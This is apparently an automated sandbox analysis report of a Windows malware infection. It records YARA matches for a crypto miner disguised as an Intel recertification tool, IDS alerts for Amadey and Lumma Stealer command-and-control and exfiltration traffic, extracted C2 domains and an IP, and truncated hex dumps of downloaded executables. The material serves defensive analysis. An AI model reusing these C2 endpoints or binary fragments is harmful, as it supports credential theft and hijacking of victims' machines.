                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_0092123B CryptContextAddRef,10_2_0092123B

                          Bitcoin Miner

                          barindex
                          Source: Yara matchFile source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000025.00000002.2341019039.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.2341019039.000000000050A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.2341646325.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.2341019039.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 1448, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6744, type: MEMORYSTR
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49715 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49717 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49718 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49725 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49727 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49728 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49737 version: TLS 1.2
                          Source: Binary string: wkernel32.pdb source: 80f68847d3.exe, 00000023.00000003.2357823497.00000000056C0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2357638575.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362789768.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362892091.0000000004F10000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdb source: 80f68847d3.exe, 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2358664230.00000000057C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363157225.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdb source: 80f68847d3.exe, 00000023.00000003.2352330362.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2352832260.0000000005790000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2361729764.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362006479.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2356903461.0000000005740000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2356532106.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362545931.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362355341.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2352330362.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2352832260.0000000005790000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2361729764.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362006479.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: 80f68847d3.exe, 00000023.00000003.2356903461.0000000005740000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2356532106.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362545931.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362355341.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernel32.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2357823497.00000000056C0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2357638575.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362789768.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362892091.0000000004F10000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2358664230.00000000057C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363157225.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: number of queries: 1001
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_009336A9 FindFirstFileExW,8_2_009336A9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0093375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_0093375A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_009336A9 FindFirstFileExW,10_2_009336A9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_0093375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_0093375A
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49709 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49710
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49712 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49719 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49723 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:55921 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:54512 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49728 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49727 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49736 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49730 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49740 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49734 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49726 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49732 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49737 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49713 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49721 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49725 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49737 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49715 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49715 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49727 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49727 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49728 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49728 -> 172.67.179.109:443
                          Source: Malware configuration extractorURLs: pancakedipyps.click
                          Source: Malware configuration extractorURLs: sustainskelet.lat
                          Source: Malware configuration extractorURLs: discokeyus.lat
                          Source: Malware configuration extractorURLs: rapeflowwj.lat
                          Source: Malware configuration extractorURLs: energyaffai.lat
                          Source: Malware configuration extractorURLs: aspecteirs.lat
                          Source: Malware configuration extractorURLs: necklacebudi.lat
                          Source: Malware configuration extractorURLs: grannyejh.lat
                          Source: Malware configuration extractorURLs: crosshuaht.lat
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 08:07:10 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 08:07:17 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 08:07:29 GMTContent-Type: application/octet-streamContent-Length: 1997824Last-Modified: Wed, 18 Dec 2024 07:16:03 GMTConnection: keep-aliveETag: "676276b3-1e7c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 60 4c 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4c 00 00 04 00 00 a5 cd 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 75 63 77 7a 73 6e 70 00 00 1a 00 00 50 32 00 00 fe 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 67 66 6b 70 72 6f 6f 00 10 00 00 00 50 4c 00 00 04 00 00 00 56 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4c 00 00 22 00 00 00 5a 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 08:07:38 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 